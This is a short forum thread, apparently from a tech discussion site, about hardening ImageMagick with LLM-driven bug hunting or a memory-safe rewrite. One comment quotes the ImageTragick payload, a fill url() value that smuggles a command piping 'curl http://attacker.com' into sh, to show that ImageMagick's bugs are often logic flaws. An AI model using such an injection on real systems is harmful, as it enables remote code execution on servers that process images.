5 ms·
It does make me wonder how much this could be hardened by, to put it in an extremely crude way, taking the current imagemagick code base and throwing a bunch of
by walrus01 13d ago
It does make me wonder how much this could be hardened by, to put it in an extremely crude way, taking the current imagemagick code base and throwing a bunch of adversarial SOTA LLMs at it to discover 'bugs' and exploits of this nature until it can be coaxed into a less dangerous state. Or even using the LLMs to fully port its functionality to a memory safe language. Would take a while to get all the changes approved and then into various distribution imagemagick packages.
- sroussey 13d agoMaybe these big ai labs will uses their own devices to find and fix bugs up and down their stack and contribute that back.
- sweetjuly 13d agoI suspect the latter is much easier and cheaper than the former? You can port a lot of software with cheap (or even local) models if you're tenacious whereas finding all the bugs is both very very expensive (if it's even possible) and potentially never ending (there's always new code and bugs!).
- msm_ 12d agoMany of the imagemagick bugs (in fact, most imagemagick bugs I remember as a former CTF player) are a logic bugs, where external program was invoked with improper sanitisation. Rewriting the code into a memory safe language is not a panacea and would not help. Famously, ImageTragick was just "fill 'url(https://example.com https://example.com"; curl http://attacker.com http://attacker.com | sh ")'"
- walrus01 12d agoThat's a very good point. I've had moderately good success with even not very smart LLMs 'fixing' things that would otherwise accept arbitrary user generated text input, to run things through a thorough sanitization pipeline, the actual code for a sanitizer is not very complex at all.